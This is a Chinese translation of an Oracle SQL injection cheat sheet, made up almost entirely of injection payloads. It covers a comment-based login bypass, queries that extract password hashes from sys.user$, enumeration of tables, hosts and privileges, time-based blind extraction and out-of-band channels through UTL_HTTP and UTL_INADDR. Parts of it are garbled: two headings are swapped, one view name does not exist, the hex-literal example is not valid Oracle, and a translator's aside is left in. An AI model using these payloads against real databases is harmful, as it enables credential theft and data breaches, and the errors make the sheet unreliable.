翻译:SQL注入之Oracle篇。
Oracle
默认数据库
SYSTEM Available in all versions 所有版本
SYSAUX Available in all versions 所有版本
注释
以下的语句可以注释掉注入语句的其余部分
-- SQL comment
例子
SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';
版本
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;
注意
Oracle
所有的select
语句必须包含一个表dual
是一个虚拟的表可以被用来测试(下面的翻译可能要好)dual
是一个可用于测试的虚拟表
数据库凭证
SELECT username FROM all_users; Available on all versions
SELECT name, password from sys.user$; Privileged, <= 10g
SELECT name, spare4 from sys.user$; Privileged, <= 11g
数据库名字
当前数据库
SELECT name FROM v$database;
SELECT instance_name FROM v$instance
SELECT global_name FROM global_name
SELECT SYS.DATABASE_NAME FROM DUAL
用户数据库
SELECT DISTINCT owner FROM all_tables;
服务器主机名字
SELECT host_name FROM v$instance; (Privileged)
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
SELECT UTL_INADDR.get_host_address FROM dual;
表和列
获取表
SELECT table_name FROM all_tables;
获取列
SELECT column_name FROM all_tab_columns;
从列名中查找表
SELECT column_name FROM all_tab_columns WHERE table_name = 'Users';
从表名中查找列
SELECT table_name FROM all_tab_tables WHERE column_name = 'password';
一次获取多张表
SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables;
逃逸引号
不像其他关系型数据库,Oracle
允许表/列名字编码
SELECT 0x09120911091 FROM dual; Hex Encoding.
SELECT CHR(32)||CHR(92)||CHR(93) FROM dual; CHR() Function.
字符串连接
SELECT 'a'||'d'||'mi'||'n' FROM dual;
条件语句
SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual
时间
延迟
SELECT UTL_INADDR.get_host_address('non-existant-domain.com') FROM dual;
严重时间延迟
AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND 300 > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));
权限
SELECT privilege FROM session_privs;
SELECT grantee, granted_role FROM dba_role_privs; (Privileged)
带外通道
DNS 请求
SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual;
SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual;
密码破解
一个Metasploit
模块JTR